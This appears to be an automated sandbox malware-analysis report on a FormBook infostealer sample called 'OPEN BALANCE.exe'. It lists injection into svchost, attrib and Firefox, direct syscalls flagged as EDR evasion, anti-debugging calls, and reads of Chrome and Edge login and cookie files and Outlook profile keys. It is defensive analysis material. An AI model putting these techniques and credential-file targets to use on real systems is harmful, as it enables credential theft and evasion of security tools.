Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ABC97C mov eax, dword ptr fs:[00000030h]	2_2_03ABC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB0946 mov eax, dword ptr fs:[00000030h]	2_2_03AB0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A30887 mov eax, dword ptr fs:[00000030h]	2_2_03A30887
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ABC89D mov eax, dword ptr fs:[00000030h]	2_2_03ABC89D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AFA8E4 mov eax, dword ptr fs:[00000030h]	2_2_03AFA8E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6C8F9 mov eax, dword ptr fs:[00000030h]	2_2_03A6C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6C8F9 mov eax, dword ptr fs:[00000030h]	2_2_03A6C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5E8C0 mov eax, dword ptr fs:[00000030h]	2_2_03A5E8C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A52835 mov eax, dword ptr fs:[00000030h]	2_2_03A52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A52835 mov eax, dword ptr fs:[00000030h]	2_2_03A52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A52835 mov eax, dword ptr fs:[00000030h]	2_2_03A52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A52835 mov ecx, dword ptr fs:[00000030h]	2_2_03A52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A52835 mov eax, dword ptr fs:[00000030h]	2_2_03A52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A52835 mov eax, dword ptr fs:[00000030h]	2_2_03A52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6A830 mov eax, dword ptr fs:[00000030h]	2_2_03A6A830
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD483A mov eax, dword ptr fs:[00000030h]	2_2_03AD483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD483A mov eax, dword ptr fs:[00000030h]	2_2_03AD483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ABC810 mov eax, dword ptr fs:[00000030h]	2_2_03ABC810
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ABE872 mov eax, dword ptr fs:[00000030h]	2_2_03ABE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03ABE872 mov eax, dword ptr fs:[00000030h]	2_2_03ABE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC6870 mov eax, dword ptr fs:[00000030h]	2_2_03AC6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AC6870 mov eax, dword ptr fs:[00000030h]	2_2_03AC6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A42840 mov ecx, dword ptr fs:[00000030h]	2_2_03A42840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A60854 mov eax, dword ptr fs:[00000030h]	2_2_03A60854
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A34859 mov eax, dword ptr fs:[00000030h]	2_2_03A34859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A34859 mov eax, dword ptr fs:[00000030h]	2_2_03A34859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6CF80 mov eax, dword ptr fs:[00000030h]	2_2_03A6CF80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A62F98 mov eax, dword ptr fs:[00000030h]	2_2_03A62F98
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A62F98 mov eax, dword ptr fs:[00000030h]	2_2_03A62F98
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4CFE0 mov eax, dword ptr fs:[00000030h]	2_2_03A4CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A4CFE0 mov eax, dword ptr fs:[00000030h]	2_2_03A4CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A70FF6 mov eax, dword ptr fs:[00000030h]	2_2_03A70FF6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A70FF6 mov eax, dword ptr fs:[00000030h]	2_2_03A70FF6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A70FF6 mov eax, dword ptr fs:[00000030h]	2_2_03A70FF6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A70FF6 mov eax, dword ptr fs:[00000030h]	2_2_03A70FF6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B04FE7 mov eax, dword ptr fs:[00000030h]	2_2_03B04FE7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE6FF7 mov eax, dword ptr fs:[00000030h]	2_2_03AE6FF7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A32FC8 mov eax, dword ptr fs:[00000030h]	2_2_03A32FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A32FC8 mov eax, dword ptr fs:[00000030h]	2_2_03A32FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A32FC8 mov eax, dword ptr fs:[00000030h]	2_2_03A32FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A32FC8 mov eax, dword ptr fs:[00000030h]	2_2_03A32FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2EFD8 mov eax, dword ptr fs:[00000030h]	2_2_03A2EFD8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2EFD8 mov eax, dword ptr fs:[00000030h]	2_2_03A2EFD8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A2EFD8 mov eax, dword ptr fs:[00000030h]	2_2_03A2EFD8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5EF28 mov eax, dword ptr fs:[00000030h]	2_2_03A5EF28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AE6F00 mov eax, dword ptr fs:[00000030h]	2_2_03AE6F00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A32F12 mov eax, dword ptr fs:[00000030h]	2_2_03A32F12
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A6CF1F mov eax, dword ptr fs:[00000030h]	2_2_03A6CF1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5AF69 mov eax, dword ptr fs:[00000030h]	2_2_03A5AF69
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A5AF69 mov eax, dword ptr fs:[00000030h]	2_2_03A5AF69
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD2F60 mov eax, dword ptr fs:[00000030h]	2_2_03AD2F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AD2F60 mov eax, dword ptr fs:[00000030h]	2_2_03AD2F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B04F68 mov eax, dword ptr fs:[00000030h]	2_2_03B04F68
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03AB4F40 mov eax, dword ptr fs:[00000030h]	2_2_03AB4F40

Source: C:\Users\user\Desktop\OPEN BALANCE.exe

Code function: 0_2_008A0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

0_2_008A0B62

Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_00872622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00872622
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_0086083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0086083F
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_008609D5 SetUnhandledExceptionFilter,	0_2_008609D5
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_00860C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00860C21

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe	NtAllocateVirtualMemory: Direct from: 0x76EF48EC	Jump to behavior
Source: C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe	NtQueryAttributesFile: Direct from: 0x76EF2E6C	Jump to behavior
Source: C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe	NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C	Jump to behavior
Source: C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe	NtQuerySystemInformation: Direct from: 0x76EF48CC	Jump to behavior
Source: C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe	NtOpenSection: Direct from: 0x76EF2E0C	Jump to behavior
Source: C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe	NtDeviceIoControlFile: Direct from: 0x76EF2AEC	Jump to behavior
Source: C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe	NtQueryValueKey: Direct from: 0x76EF2BEC	Jump to behavior
Source: C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe	NtQueryInformationToken: Direct from: 0x76EF2CAC	Jump to behavior
Source: C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe	NtCreateFile: Direct from: 0x76EF2FEC	Jump to behavior
Source: C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe	NtOpenFile: Direct from: 0x76EF2DCC	Jump to behavior
Source: C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe	NtTerminateThread: Direct from: 0x76EF2FCC	Jump to behavior
Source: C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe	NtOpenKeyEx: Direct from: 0x76EF2B9C	Jump to behavior
Source: C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe	NtSetInformationProcess: Direct from: 0x76EF2C5C	Jump to behavior
Source: C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe	NtProtectVirtualMemory: Direct from: 0x76EF2F9C	Jump to behavior
Source: C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe	NtWriteVirtualMemory: Direct from: 0x76EF2E3C	Jump to behavior
Source: C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe	NtNotifyChangeKey: Direct from: 0x76EF3C2C	Jump to behavior
Source: C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe	NtCreateMutant: Direct from: 0x76EF35CC	Jump to behavior
Source: C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe	NtResumeThread: Direct from: 0x76EF36AC	Jump to behavior
Source: C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe	NtMapViewOfSection: Direct from: 0x76EF2D1C	Jump to behavior
Source: C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe	NtAllocateVirtualMemory: Direct from: 0x76EF2BFC	Jump to behavior
Source: C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe	NtQuerySystemInformation: Direct from: 0x76EF2DFC	Jump to behavior
Source: C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe	NtReadFile: Direct from: 0x76EF2ADC	Jump to behavior
Source: C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe	NtDelayExecution: Direct from: 0x76EF2DDC	Jump to behavior
Source: C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe	NtQueryInformationProcess: Direct from: 0x76EF2C26	Jump to behavior
Source: C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe	NtResumeThread: Direct from: 0x76EF2FBC	Jump to behavior
Source: C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe	NtCreateUserProcess: Direct from: 0x76EF371C	Jump to behavior
Source: C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe	NtOpenKeyEx: Direct from: 0x76EF3C9C	Jump to behavior
Source: C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe	NtWriteVirtualMemory: Direct from: 0x76EF490C	Jump to behavior
Source: C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe	NtSetInformationThread: Direct from: 0x76EE63F9	Jump to behavior
Source: C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe	NtClose: Direct from: 0x76EF2B6C
Source: C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe	NtSetInformationThread: Direct from: 0x76EF2B4C	Jump to behavior
Source: C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe	NtReadVirtualMemory: Direct from: 0x76EF2E8C	Jump to behavior
Source: C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe	NtCreateKey: Direct from: 0x76EF2C6C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\attrib.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\attrib.exe	Section loaded: NULL target: C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\attrib.exe	Section loaded: NULL target: C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\attrib.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\attrib.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\attrib.exe

Thread register set: target process: 2316

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\attrib.exe

Thread APC queued: target process: C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\OPEN BALANCE.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 2F23008

Jump to behavior

Source: C:\Users\user\Desktop\OPEN BALANCE.exe

0_2_008A1201

Source: C:\Users\user\Desktop\OPEN BALANCE.exe

Code function: 0_2_00882BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00882BA5

Source: C:\Users\user\Desktop\OPEN BALANCE.exe

Code function: 0_2_008AB226 SendInput,keybd_event,

0_2_008AB226

Source: C:\Users\user\Desktop\OPEN BALANCE.exe

Code function: 0_2_008C22DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,

0_2_008C22DA

Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\OPEN BALANCE.exe"	Jump to behavior
Source: C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe	Process created: C:\Windows\SysWOW64\attrib.exe "C:\Windows\SysWOW64\attrib.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\attrib.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\OPEN BALANCE.exe

0_2_008A0B62

Source: C:\Users\user\Desktop\OPEN BALANCE.exe

Code function: 0_2_008A1663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_008A1663

Source: OPEN BALANCE.exe, 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: VnZdrTcLqvUA.exe, 00000004.00000000.2393040257.0000000001681000.00000002.00000001.00040000.00000000.sdmp, VnZdrTcLqvUA.exe, 00000004.00000002.3918879886.0000000001681000.00000002.00000001.00040000.00000000.sdmp, VnZdrTcLqvUA.exe, 00000008.00000002.3919260129.0000000000CE1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: OPEN BALANCE.exe, VnZdrTcLqvUA.exe, 00000004.00000000.2393040257.0000000001681000.00000002.00000001.00040000.00000000.sdmp, VnZdrTcLqvUA.exe, 00000004.00000002.3918879886.0000000001681000.00000002.00000001.00040000.00000000.sdmp, VnZdrTcLqvUA.exe, 00000008.00000002.3919260129.0000000000CE1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: VnZdrTcLqvUA.exe, 00000004.00000000.2393040257.0000000001681000.00000002.00000001.00040000.00000000.sdmp, VnZdrTcLqvUA.exe, 00000004.00000002.3918879886.0000000001681000.00000002.00000001.00040000.00000000.sdmp, VnZdrTcLqvUA.exe, 00000008.00000002.3919260129.0000000000CE1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: VnZdrTcLqvUA.exe, 00000004.00000000.2393040257.0000000001681000.00000002.00000001.00040000.00000000.sdmp, VnZdrTcLqvUA.exe, 00000004.00000002.3918879886.0000000001681000.00000002.00000001.00040000.00000000.sdmp, VnZdrTcLqvUA.exe, 00000008.00000002.3919260129.0000000000CE1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\OPEN BALANCE.exe

Code function: 0_2_00860698 cpuid

0_2_00860698

Source: C:\Users\user\Desktop\OPEN BALANCE.exe

Code function: 0_2_008B8195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,

0_2_008B8195

Source: C:\Users\user\Desktop\OPEN BALANCE.exe

Code function: 0_2_0089D27A GetUserNameW,

0_2_0089D27A

Source: C:\Users\user\Desktop\OPEN BALANCE.exe

Code function: 0_2_0087B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

0_2_0087B952

Source: C:\Users\user\Desktop\OPEN BALANCE.exe

Code function: 0_2_008442DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_008442DE

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2470951114.00000000062C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3918981184.0000000002CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3918918211.0000000002C90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2469686151.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3918414894.0000000000630000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3917936573.0000000002550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3919198239.0000000002D60000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2470241137.0000000003DA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\attrib.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\attrib.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\attrib.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\attrib.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\attrib.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\attrib.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\attrib.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\attrib.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\attrib.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: OPEN BALANCE.exe	Binary or memory string: WIN_81
Source: OPEN BALANCE.exe	Binary or memory string: WIN_XP
Source: OPEN BALANCE.exe, 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: OPEN BALANCE.exe	Binary or memory string: WIN_XPe
Source: OPEN BALANCE.exe	Binary or memory string: WIN_VISTA
Source: OPEN BALANCE.exe	Binary or memory string: WIN_7
Source: OPEN BALANCE.exe	Binary or memory string: WIN_8

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2470951114.00000000062C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3918981184.0000000002CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3918918211.0000000002C90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2469686151.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3918414894.0000000000630000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3917936573.0000000002550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3919198239.0000000002D60000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2470241137.0000000003DA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_008C1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,		0_2_008C1204
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_008C1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_008C1806

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
